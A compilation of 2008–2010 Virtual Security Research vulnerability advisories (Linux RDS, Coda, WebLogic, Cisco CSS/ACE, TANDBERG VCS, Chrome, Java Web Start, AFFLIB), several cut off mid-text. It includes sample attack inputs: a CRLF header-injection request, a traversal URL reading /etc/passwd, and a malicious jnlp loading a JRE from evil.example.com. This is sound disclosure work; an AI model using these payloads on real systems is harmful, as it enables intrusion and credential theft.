2010-09-30Citrix confirmed continued investigation of the issue. 2010-10-19VSR follow-up to determine status of issue. 2010-10-26Citrix verified issue only exists in NT4 authentication feature. 2010-12-01VSR follow-up to determine status of issue. 2010-12-02Citrix confirmed December 14th release of security bulletin. 2010-12-14Citrix releases security bulletin. 2010-12-20CVE assigned 2010-12-21VSR releases advisory. The Citrix advisory may be obtained at: http://support.citrix.com/article/CTX127613 Recommendation -- Citrix has indicated that this vulnerability only affects legacy NT4 authentication which has been removed from the latest release of the device firmware. Common Vulnerabilities and Exposures (CVE) Information -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-4566 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes
VSR Advisories: Linux RDS Protocol Local Privilege Escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Linux RDS Protocol Local Privilege Escalation Release Date: 2010-10-19 Application: Linux Kernel Versions: 2.6.30 - 2.6.36-rc8 Severity: High Author: Dan Rosenberg drosenberg (at) vsecurity (dot) com Vendor Status: Patch Released [3] CVE Candidate: CVE-2010-3904 Reference: http://www.vsecurity.com/resources/advisory/20101019-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: Linux is a free Unix-type operating system originally created by Linus Torvalds with the assistance of developers around the world. Developed under the GNU General Public License, the source code for Linux is freely available to everyone. - From [2]: Reliable Datagram Sockets (RDS) provide in order, non-duplicating, highly available, low overhead, reliable delivery of datagrams between hundreds of thousands of non-connected endpoints. Vulnerability Overview - -- On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write abritrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root. Vulnerability Details - - On Linux, recvmsg() style socket calls are performed using iovec structs, which allow a user to specify a base address and size for a buffer used to receive socket data. Each packet family is responsible for defining functions that copy socket data, which is received by the kernel, back to user space to allow user programs to process and handle received network data. When performing this copying of data to user space, the RDS protocol failed to verify that the base address of a user-provided iovec struct pointed to a valid userspace address before using the __copy_to_user_inatomic() function to copy the data. As a result, by providing a kernel address as an iovec base and issuing a recvmsg() style socket call, a local user could write arbitrary data into kernel memory. This can be leveraged to escalate privileges to root. Proof-of-Concept Exploit - VSR has developed a proof-of-concept exploit [4] to both demonstrate the severity of this issue as well as allow users and administrators to verify the existence of the vulnerability. The exploit leverages the ability to write into kernel memory to reset the kernel's security operations structure and gain root privileges. The exploit requires that kernel symbol resolution is available to unprivileged users, via /proc/kallsyms or similar, as is the case on most stock distributions. It has been tested on both 32-bit and 64-bit x86 platforms. While this exploit has been reliable during testing, it is not advised to run kernel exploits on production systems, as there is a risk of causing system instability and crashing the affected machine. Versions Affected - - This vulnerability affects unpatched versions of the Linux kernel, starting from 2.6.30, where the RDS protocol was first included. Installations are only vulnerable if the CONFIG_RDS kernel configuration option is set, and if there are no restrictions on unprivileged users loading packet family modules, as is the case on most stock distributions. Vendor Response - --- The following timeline details Linux's response to the reported issue. 2010-10-13Vulnerability reported to Linux security team 2010-10-13Response, agreement on disclosure date 2010-10-19Fix publicly committed [3] 2010-10-19Coordinated disclosure Recommendation - -- Users should either install updates provided by downstream distributions, or apply the committed patch [3] and recompile their kernel. Common Vulnerabilities and Exposures (CVE) Information - -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-3904 to this issue. This is a candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements - Thanks to Andrew Morton, Linus Torvalds, Andy Grover, and Eugene Teo for their prompt responses and patch. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. Linux kernel http://www.linux.org 2. Reliable Datagram Sockets
CVE-2010-3014: Coda Filesystem Kernel Memory Disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Coda Filesystem Kernel Memory Disclosure Release Date: 2010-08-16 Application: Coda kernel module for NetBSD and FreeBSD Versions: All known versions Severity: Medium Author: Dan Rosenberg drosenberg (at) vsecurity (dot) com Vendor Status: Patch Released [2][3] CVE Candidate: CVE-2010-3014 Reference: http://www.vsecurity.com/resources/advisory/20100816-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: Coda is a distributed filesystem with its origin in AFS2. It has many features that are very desirable for network filesystems. Currently, Coda has several features not found elsewhere. 1. disconnected operation for mobile computing 2. is freely available under a liberal license 3. high performance through client side persistent caching 4. server replication 5. security model for authentication, encryption and access control 6. continued operation during partial network failures in server network 7. network bandwidth adaptation 8. good scalability 9. well defined semantics of sharing, even in the presence of nework failure Vulnerability Overview - -- On July 19th, VSR identified a vulnerability in the Coda filesystem kernel module, as implemented for FreeBSD and NetBSD. By sending a specially crafted ioctl request to a mounted Coda filesystem, an unprivileged local user could read large portions of kernel heap memory, leading to the disclosure of potentially sensitive information. Product Background - -- Coda is implemented as a kernel filesystem module with userland components. System calls involving file I/O are passed to the Coda kernel module, which in turn passes the request to the userland Venus cache manager via a character device. Venus answers the request by checking its cache or requesting content from the Coda server. Coda implements most standard filesystem operations, including providing an ioctl interface. Vulnerability Details - - Coda ioctls are passed through the Coda filesystem module before being sent to Venus. The arguments to a Coda ioctl are encapsulated in a PioctlData struct, which in turn contains a ViceIoctl struct. The ViceIoctl struct contains in_size and out_size fields, dictating the expected size of the input and output data corresponding to a particular ioctl request. The in_size field is validated to prevent memory corruption via copying an unexpected amount of data from userspace into a kernel buffer. However, the out_size field was missing this validation. When copying the output data of an ioctl request back to userspace, the out_size field was used to determine the amount of data to copy, without restricting it to a maximum possible size. By specifying a large value for this field, the contents of the kernel heap beyond the data intended to be returned to the user would be copied into a userland buffer. An unprivileged user could exploit this to read large portions of the kernel heap, potentially disclosing sensitive information. Versions Affected - - This vulnerability affects all known versions of the Coda filesystem module as included in FreeBSD and NetBSD. The Linux Coda module is not affected. Vendor Response - --- The following timeline details FreeBSD's and NetBSD's response to the reported issue: 2010-07-19Vulnerability reported to FreeBSD and NetBSD 2010-07-20Fix committed by NetBSD [2] 2010-07-21Response from FreeBSD 2010-07-21FreeBSD and NetBSD provided a draft advisory 2010-08-05Fix committed by FreeBSD [3] 2010-08-16Coordinated disclosure Recommendation - -- Coda users should apply the updates committed by NetBSD [2] and FreeBSD[3]. Common Vulnerabilities and Exposures (CVE) Information - -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-3014 to this issue. This is a candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements - Thanks to the FreeBSD and NetBSD security teams for their prompt responses. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. Coda File System http://www.coda.cs.cmu.edu 2. Coda module in NetBSD CVS http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/coda/?only_with_tag=MAIN 3. FreeBSD SVN revision 210997 http://svn.freebsd.org/viewvc/base?view=revisionrevision=210997 - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This advisory is
CVE-2010-2375: WebLogic Plugin HTTP Injection via Encoded URLs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
VSR Security Advisory
http://www.vsecurity.com/
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: WebLogic Plugin HTTP Injection via Encoded URLs
Release Date: 2010-07-13
Application: WebLogic Plugin
Versions: All known versions
Severity: High
Discovered by: Timothy D. Morgan tmorgan (at) vsecurity {dot} com
Contributors: George D. Gal ggal {at} vsecurity (dot) com
Vendor Status: Patch Released [4]
CVE Candidate: CVE-2010-2375
Reference: http://www.vsecurity.com/resources/advisory/20100713-1/
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description
- ---
The product is best described by Oracle marketing literature in:
Oracle WebLogic Server Enterprise Edition offers enterprises the ability to
consolidate their applications on a pool of shared servers for both high
efficiency and superior performance. No other application server has
the proven performance on industry benchmarks across the most varied
chip types and operating systems. Sophisticated High Availability
(HA) features built on clustered instances ensure uptime. Easy-to-use
yet substantial management tools keep systems going without hassle or
expense. By coalescing applications and services onto Oracle WebLogic
Server, IT is in position to react swiftly to change and help the
enterprise outperform the competition. -- [1]
And:
Oracle WebLogic Server Web Server Plugins provide load balancing
across WebLogic Server Clusters by acting as front-end proxies. While
WebLogic Server Web Server Plugins 1.0 are bundled with WebLogic
Server, these new WebLogic Server Web Server Plugins 1.1 are
downloadable separately outside of WebLogic Server and deliver
enhanced functionality and improved security. -- [2]
Vulnerability Overview
- --
Over the last several years, VSR analysts had observed unusual behavior
in multiple WebLogic deployments when certain special characters were
URL encoded and appended to URLs. In late April, 2010 VSR began
researching this more in depth and found that the issue could allow for
HTTP header injection and HTTP request smuggling attacks.
Product Background
- --
WebLogic application server is commonly deployed in a three-tier
architecture where the application server resides behind a public-facing
web server. Oracle provides proprietary web server plugin modules for
multiple web server software packages on various platforms in order to
allow these services to act as reverse proxies and in some cases, load
balancers for multiple middle-tier WebLogic application servers.
Vulnerability Overview
- --
The vulnerability stems from the web server plugin's processing of URLs
submitted by users. When a URL is received, it is URL decoded at some
point, but is not re-encoded prior to inclusion in requests to the
middle-tier WebLogic server. This allows for special characters, such
as new lines, to be injected into requests directed at application
servers.
For instance, if an attacker were to send the following simple request:
GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
Host: vulnerable.example.com
Connection: close
The web server proxy module would instead send a request on to the
application server which looks more like:
GET /logo.gif HTTP/1.1
X-hdr: x HTTP/1.1
Host: vulnerable.example.com
Connection: close
This behavior allows for a wide variety of attacks, including trusted
header injection and HTTP request smuggling.
Attack Scenarios
-
In the simplest scenarios, an attacker could use this flaw to inject
malicious versions of headers which are considered trusted. In certain
situations, headers are added to requests by the web server proxy module
which may be used to make decisions about authentication or access
control.
For instance, the WL-Proxy-Client-IP header is added to requests to
indicate to the application server which IP address the client used. If
the application server uses this to enforce IP-based access control
restrictions, then clearly this injection vulnerability could be used to
bypass this restriction.
Another example would be the injection of a WL-Proxy-Client-Cert
header. This header is used in deployments where clients are provided
SSL/TLS client certificates for authentication. Since web servers would
typically terminate this encrypted communication, application servers
need a way of identifying the user who was authenticated. The
WL-Proxy-Client-Cert header is used to communicate this information between
the web server plugin and application servers. By injecting a false
version of this header, it would be possible to impersonate other users
and perhaps avoid presenting a client certificate at all.
More complex attacks are also possible by
VSR Advisory: Multiple Cisco CSS / ACE Client Certificate and HTTP Header Manipulation Vulnerabilities
Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Multiple Cisco CSS / ACE Client Certificate and HTTP Header Manipulation Vulnerabilities Release Date: 2010-07-02 Application: Cisco Content Services Switch (CSS) / ACE Products Versions: Cisco CSS 11500 - 08.20.1.01 Cisco ACE 4710 - Version A3(2.5) [build 3.0(0)A3(2.5) (Other versions may be affected) Severity: High (in specific configurations) Author: George D. Gal ggal (a) vsecurity . com Vendor Status: Cisco CSS vulnerability remains unpatched, workarounds available Cisco ACE workarounds available CVE Candidate: CVE-2010-1575 - Certificate Spoofing Flaw CVE-2010-1576 - HTTP Request Parsing Flaw Reference: http://www.vsecurity.com/resources/advisory/20100702-1/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description --- From [1]: The Cisco CSS 11500 Series Content Services Switch is a high-performance, high-availability modular architecture for Web infrastructures. As the premiere switch for the Cisco Web Network Services Software, the Cisco CSS 11500 Series helps businesses to build global Web networks optimized for content delivery and e-commerce. By activating HTTP headers, the CSS 11500 Series helps to ensure availability, optimize utilization, reduce latency, increase scalability, and enhance security for Websites, server farms, cache clusters, and firewall systems. From [2]: Cisco(R) ACE Application Control Engine application switches represent the state of the art in next-generation application switches for increasing the availability, performance, and security of data center applications. The Cisco ACE family of application switches includes the Cisco ACE Service Module for the Cisco Catalyst(R) 6500 Series Switches and Cisco 7600 Series Routers, as well as the Cisco ACE 4710 Appliance in a standalone form factor for discrete data center deployments. Vulnerability Overview -- On June 4th 2009, VSR identified multiple weaknesses in the Cisco CSS 11500's handling of HTTP header interpretation and client-side SSL certificates. Individually, these issues may be considered minor, but combined they could allow for the compromise of an application that relies on a vulnerable CSS to assist in authenticating clients. If successfully exploited, an attacker could spoof another application user's identity without possession of the victim's client certificate. Additionally, due to the fact that the Cisco CSS product has been effectively superceded by the Cisco ACE, VSR has also identified similar issues to those described below in the ACE in particular configurations. These issues may affect any CSS installation, but would have the greatest impact on deployments that have the following feature enabled in the configuration: ssl-server context http-header client-cert Similarly, on the Cisco ACE, these issues may manifest themselves when using a policy map with a class-default class, as shown below: policy-map type loadbalance first-match SLB-VIP-REDIRECT class class-default serverfarm TEST-FARM action DO-SOMETHING-WITH-HEADERS insert-http X-SRC-IP header-value %is Issue 1: Weak Enforcement of Authority in HTTP Certificate Headers -- Cisco Bug Id - CSCSZ04690 Affects - Cisco CSS The first weakness affecting the Cisco CSS is that, in a typical client certificate configuration, HTTP clients may confuse web applications by injecting their own certificate headers. When utilizing the CSS to terminate SSL communications, SSL client certificates are first authenticated by the CSS. From there, the CSS will normally pass the client's identity to the back-end web server in the form of several HTTP headers as shown below: ClientCert-Subject: XXX ClientCert-Subject-CN: XXX ClientCert-Fingerprint: XXX ClientCert-Subject-CN: XXX ClientCert-Issuer-CN: XXX ClientCert-Certificate-Version: XXX ClientCert-Serial-Number: XXX ClientCert-Data-Signature-Algorithm: XXX ClientCert-Subject: XXX ClientCert-Issuer: XXX ClientCert-Not-Before: XXX ClientCert-Not-After: XXX ClientCert-Public-Key-Algorithm: XXX ClientCert-RSA-Modulus-Size: XXX ClientCert-RSA-Modulus: XXX ClientCert-RSA-Exponent: XXX ClientCert-X509v3-Subject-Key-Identifier: XXX ClientCert-X509v3-Authority-Key-Identifier: XXX ClientCert-Signature-Algorithm: XXX ClientCert-Signature: XXX However, there is no attempt by the CSS to prevent clients from supplying their own ClientCert-* headers. Depending on how application developers handle multiple copies of these headers, an attacker may be able to impersonate other users. For
CVE-2009-4510: TANDBERG VCS Static SSH Host Keys
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: TANDBERG Video Communication Server Static SSH Host Keys Release Date: 2010-04-09 Application: Video Communication Server (VCS) Versions: x4.3.0, x4.2.1, and possibly earlier Severity: High Discovered by: Jon Hart Advisory by: Timothy D. Morgan tmorgan (a) vsecurity . com Vendor Status: Firmware version x5.1.1 released [2]. CVE Candidate: CVE-2009-4510 Reference: http://www.vsecurity.com/resources/advisory/20100409-2/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: The Video Communication Server (VCS) is an integral part of the TANDBERG Total Solution and is the center of the video communications network, connecting the benefits of video conferencing and telepresence to other communications environments including unified communications and IP Telephony networks. Vulnerability Overview - -- On December 2nd, VSR identified a SSH service authentication weakness vulnerability in the TANDBERG's Video Communication Server. This issue would allow an attacker with privileged network access to conduct server impersonation and man-in-the-middle attacks on administrator SSH sessions. Successful attacks could yield shell access to vulnerable appliances. Product Background - -- The TANDBERG Video Communication Server is a Linux-based appliance which supports the interoperation of a plethora of video and voice communications devices. The VCS provides several system shell accounts accessible via the SSH protocol. Vulnerability Details - - The TANDBERG VCS appliance is deployed by default with a DSA ssh key pair stored in files: /tandberg/sshkeys/ssh_host_dsa_key /tandberg/sshkeys/ssh_host_dsa_key.pub In tested versions of the firmware, this default key has a fingerprint of: 49:53:bf:94:2a:d7:0c:3f:48:29:f7:5b:5d:de:89:b8 No new key is generated upon installation. In addition, this default key would overwrite any SSH server keys, if installed by security-conscious administrators previously, during a firmware upgrade. Due to the public nature of this key (see firmware downloads [2]) an attacker would be able to conduct server impersonation and man-in-the-middle attacks on SSH connections directed at any TANDBERG VCS device. A successful exploit would most likely yield an attacker shell access to the device with privileges of the victim client. Versions Affected - - VSR has observed this vulnerability in version x4.2.1. Based on preliminary analysis of configuration files and scripts [2], versions x4.3.0 and x5.0 also appear to be vulnerable. Earlier versions have not been tested. Vendor Response - --- The following timeline details TANDBERG's response to the reported issue: 2009-12-09Preliminary notice to TANDBERG. TANDBERG responded immediately. 2009-12-22VSR provided TANDBERG a draft advisory. 2009-12-28TANDBERG provided VSR with a beta version of the x5.0 firmware, but this did not appear to correct the issue. 2010-01-22TANDBERG provided VSR with a beta version of the x5.1 firmware, but this did not appear to correct the issue for existing installations, since old vulnerable keys would be preserved. 2010-01-28TANDBERG explained that changing SSH keys automatically on administrators may cause backward compatibility problems. Therefore, TANDBERG decided to preserve old keys even when upgrading a system which contains a vulnerable key. Administrators will instead be warned in the web console that a vulnerable key is in use and will be expected to update host keys manually. 2010-03-26TANDBERG provided VSR with a release candidate firmware for version x5.1.1. 2010-04-07TANDBERG VCS firmware version x5.1.1 released [2]. 2010-04-09VSR advisory released. Recommendation - -- Immediately replace the current SSH host key with a new one. This may be accomplished through one of several methods. One approach is to simply log in to the device locally and use the ssh-keygen utility to replace the keys stored in /tandberg/sshkeys/. Consult TANDBERG documentation for other methods. After replacing the SSH host keys, it is recommended that the VCS firmware be upgraded to X5.1.1 as soon as possible. NOTE: Upgrading or downgrading to versions prior to X5.1.1 will cause any custom SSH host keys to be overwritten. Version X5.1.1 and later should preserve any custom host keys previously installed. As a precaution, after
CVE-2009-4511: TANDBERG VCS Arbitrary File Retrieval
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: TANDBERG Video Communication Server Arbitrary File Retrieval
Release Date: 2010-04-09
Application: Video Communication Server (VCS)
Versions: x4.3.0, x4.2.1, and possibly earlier
Severity: Medium
Discovered by: Jon Hart
Advisory by: Timothy D. Morgan tmorgan (a) vsecurity . com
Vendor Status: Firmware update released [2]
CVE Candidate: CVE-2009-4511
Reference: http://www.vsecurity.com/resources/advisory/20100409-3/
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description
- ---
- From [1]:
The Video Communication Server (VCS) is an integral part of the TANDBERG
Total Solution and is the center of the video communications network,
connecting the benefits of video conferencing and telepresence to other
communications environments including unified communications and IP Telephony
networks.
Vulnerability Overview
- --
On December 3rd, VSR identified a directory traversal and file retrieval
vulnerability in the TANDBERG's Video Communication Server. This issue would
allow an authenticated attacker (who has access as an administrator or less
privileged user on the web administration interface) to retrieve files from the
filesystem which are readable by the nobody system user.
Product Background
- --
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices. The VCS provides a web-based management interface implemented in PHP
which allows administrators to perform a wide variety of actions, including
configuration of the device, management of user accounts, firmware updates,
along with number of other items.
Vulnerability Details
- -
The TANDBERG VCS web management interface provides two nearly identical scripts
at URLs:
https://vulnerable.example.com/helppage.php
https://vulnerable.example.com/user/helppage.php
These help pages accept a file parameter in the URL which can be used to
retrieve nearly arbitrary files from the filesystem. The relevant source code
for these pages is as follows:
// The following is Copyright (C) 2009 TANDBERG //
...
// Grab the content before we write anything: we'll need it for the title tag
in the head
// Dig out the page title, from the title tag,
// then remove any surround in the page as we add our own...
$filename = $this-helpPagePath . $_GET['page'] . $this-helpPageSuffix;
if (! file_exists($filename)) {
$helpHTML = There is no help available for the . $_GET['page'] .
pagebr/;
$pageTitle = $_GET['page'];
}else{
$helpHTML = file_get_contents($filename);
...
echo \n!-- ** --\n;
echo $helpHTML;
echo !-- ** --\n;
...
// end of excerpt //
Here, the final path string ($filename) loaded and displayed to the user is
prepended with a directory and appended with a file extension. Using simple
directory traversal techniques (../) it is possible to traverse to any
directory on the filesystem. Using a trailing NUL byte encoded in the URL (%00)
it is also possible to truncate the file path to eliminate the file extension.
For instance, the following URL retrieves the /etc/passwd file:
https://vulnerable.example.com/helppage.php?page=../../../../etc/passwd%00
During testing, it was found that the x4.2.1 firmware runs the web server as the
nobody user, which somewhat limits the amount of sensitive information that
may be obtained. However, since shadowed passwords were not configured, it was
possible to retrieve all local system users' password hashes from /etc/passwd.
Additional password hashes are available in /tandberg/persistent/etc/digest.
Versions Affected
- -
VSR has successfully exploited this issue in firmware version x4.2.1. Based on
preliminary source code analysis[2], versions x4.3.0 and x5.0 also appear to be
vulnerable. Earlier versions have not been tested.
Vendor Response
- ---
The following timeline details TANDBERG's response to the reported issue:
2009-12-09Preliminary notice to TANDBERG. TANDBERG responded immediately.
2009-12-22VSR provided TANDBERG a draft advisory.
2009-12-28TANDBERG provided VSR with a beta version of the x5.0 firmware,
but this did not appear to correct the issue (based on PHP code
analysis alone).
2010-01-22TANDBERG provided VSR with a beta version of the x5.1 firmware
for testing which appeared to correct the vulnerability.
2010-03-26TANDBERG provided VSR with a release candidate firmware for
version x5.1.1.
2010-04-07TANDBERG
Chrome Password Manager Cross Origin Weakness (CVE-2010-0556)
Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Chrome Password Manager Cross Origin Weakness Release Date: 2010-02-15 Application: Google Chrome Web Browser Versions: 4.0.249.78, 3.0.195.38, and likely earlier Severity: Medium/Low Author: Timothy D. Morgan tmorgan (a) vsecurity . com Vendor Status: Update Released [2] CVE Candidate: CVE-2010-0556 Reference: http://www.vsecurity.com/resources/advisory/20100215-1/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description --- Google Chrome is a web browser that runs web pages and applications with lightning speed. [1] Vulnerability Overview -- In mid-January, VSR identified a vulnerability in Google Chrome which could be used in phishing attacks in specific types of web sites. This issue may make it much easier to convince a victim to submit web application credentials to the attacker's site. Vulnerability Details - As with many modern browsers, Google Chrome implements a password manager to help users keep track of credentials used on various web sites. It may be used to store either HTTP authentication credentials or form-based credentials. The vulnerability surfaces in a situation where a user visits a web page which includes an embedded object, such as an image, from a third-party site. If an attacker had control of the third-party web server, he could request credentials from the user via HTTP authentication. This style of attack has been documented in the past, and some of variations on this theme are explored in a recent paper by VSR [5]. However, in the case of vulnerable versions of Google Chrome, the password manager may pre-fill the authentication dialog box with credentials intended for parent page's domain, leaving users one click away from account compromise. This issue would affect Chrome users which use applications that allow users to embed objects from third parties. Examples of such applications may include message boards, blogs, or social networking sites. The following steps may be used to reproduce the issue: 1. Set up an HTML page with the following contents: htmlbody img src=http://evil.example.com/image.png; / /body/html This page should not be protected by any authentication and should be hosted at: http://victim.example.org/test-img.html 2. Set up an HTTP digest protected area under the following URL: http://victim.example.org/private/ 3. Set up the attacker's server to be protected by HTTP authentication such that the following URL is protected: http://evil.example.com/image.png 4. Use Google Chrome to log in to an area protected with HTTP authentication, such as: http://victim.example.org/private Save the password in the password manager. 5. Finally, access the unauthenticated HTML page on the victim's server: http://victim.example.org/test-img.html Since the embedded image requires authentication, a password prompt should appear. In vulnerable versions of Google Chrome, this form will be pre-filled with the stored credentials from the victim.example.org domain, even though the password prompt is generated by evil.example.com. Versions Affected - The issue was originally discovered in version 3.0.195.38 and was also verified to exist in version 4.0.249.78. Testing was conducted on the Windows platform. Vendor Response --- The following timeline details Google's response to the reported issue: 2010-01-20VSR submitted a security bug report [3]. Chromium development team began researching the issue. 2010-01-21VSR provided additional details on the test scenario. Chromium developers successfully reproduced the issue and committed a fix to the source repository [4]. 2010-02-10Chrome stable version 4.0.249.89 released which includes the fix. 2010-02-15VSR advisory released. Recommendation -- Upgrade to the latest version of Google Chrome as soon as possible. Users are advised to be wary of HTTP authentication prompts and to carefully inspect the domains presented in these messages to see if they match the domain of the expected site. Common Vulnerabilities and Exposures (CVE) Information -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-0556 to this issue. This is a candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements Thanks to the Chromium development team for the prompt response.
CVE-2008-2086: Java Web Start File Inclusion via System Properties Override
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Java Web Start File Inclusion via System Properties Override
Release Date: 2008-12-03
Application: Sun Java Runtime Environment / Java Web Start
Versions: See below
Severity: High
Author: Timothy D. Morgan tmorgan {a} vsecurity.com
Vendor Status: Patch Released [3]
CVE Candidate: CVE-2008-2086
Reference: http://www.vsecurity.com/bulletins/advisories/2008/JWS-props.txt
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description
- ---
- From [1]:
Using Java Web Start technology, standalone Java software applications
can be deployed with a single click over the network. Java Web Start
ensures the most current version of the application will be deployed,
as well as the correct version of the Java Runtime Environment (JRE).
Vulnerability Overview
- --
On March 27th, VSR identified a vulnerability in Java Web Start related
to the execution of privileged applications. This flaw could allow an
attacker to execute arbitrary code on a victim system if a user could be
convinced to visit a malicious web site.
Product Background
- --
Java Web Start (JWS) applications are launched through specially
formatted XML files hosted on web sites with a jnlp file extension.
These files reference one or more jar files which are meant to be
downloaded and executed by client systems. JWS applications are run in
unprivileged mode by default but may be run with full user privileges if
the jnlp file requests this access. Privileged JWS applications must
have each jar file signed by the same trusted author in order to be
executed. However, jnlp files are not signed and may be hosted by
third-party web sites.
In addition to specifying application components, the jnlp specification
permits application authors to supply certain System properties which
may be retrieved by the application through the System.getProperty() and
System.getProperties() methods. Besides any user-supplied properties,
the Java VM also provides access to a number of sensitive runtime
settings through this interface.
More information on the jnlp format may be found in [2].
Vulnerability Details
- -
VSR discovered an unsafe behavior in the way properties are interpreted
when specified in jnlp files. In certain versions of the Java Runtime
Engine (JRE), values supplied through jnlp files override existing
system defaults. Thus far, VSR has verified the following System
properties may be overridden:
java.home
java.ext.dirs
user.home
Of particular interest are the java.home and java.ext.dirs properties.
If an attacker could lure a victim to open a malicious jnlp file which
references a trusted application, it may be executed without any
confirmation by the user. However, as the application attempts to load
classes, it may trust the malicous java.home and/or java.ext.dirs value.
These paths could point to a malicious local or remote JRE or extensions
installation. It appears that under Windows, UNC network paths may be
used for the java.home value. It is not yet known whether or not UNC
paths may be used for java.ext.dirs.
During testing, VSR found that Java Cryptography Extension (JCE) classes
failed to load when java.home was set to an invalid path. However, by
setting this path to network share which hosted a valid JRE
installation, the JCE classes loaded correctly. If such a network share
were hosted by the attacker, then arbitrary code could potentially be
loaded without restrictions, unbeknownst to the victim.
The following XML shows what a malicious jnlp file might look like.
Note that the malicious jnlp file would likely be very similar to the
ones users normally rely on with certain properties overriden in the
resources section.
jnlp spec=1.0+ codebase=http://trusted.example.org/; href=evil.jnlp
information
titleTrusted Application/title
vendorTrusted Vendor/vendor
descriptionTrusted Application by Trusted Vendor/description
homepage href=http://trusted.example.org/; /
offline-allowed /
/information
securityall-permissions //security
resources
j2se version=1.5+ /
!-- Next line overrides the JRE's java.home System property --
property name=java.home value=\\evil.example.com\jre /
jar href=signed-and-trusted-jce-dependent-library.jar /
/resources
application-desc main-class=org.example.trusted.app.StartApp /
/jnlp
To fully exploit this specific attack vector, an attacker would need to
remotely or locally host a malicious version of classes used by a
trusted application and then lure a user into opening a malicious jnlp
AFFLIB(TM): Multiple Buffer Overflows
(path,fn+match[2].rm_so,match[2].rm_eo-match[2].rm_so);
The overflow occurs because the length specified to memcpy() is the
length of the regular expression match, without regard to the size of
the path buffer. This may be exploitable in scenarios where an attacker
could pass command line parameters to a privileged aimage program, or
via a program written by a third-party developer.
* Stack-based Buffer Overflow in libewf Vnode Wrapper *
File: lib/vnode_ewf.cpp
Line: 70
Description:
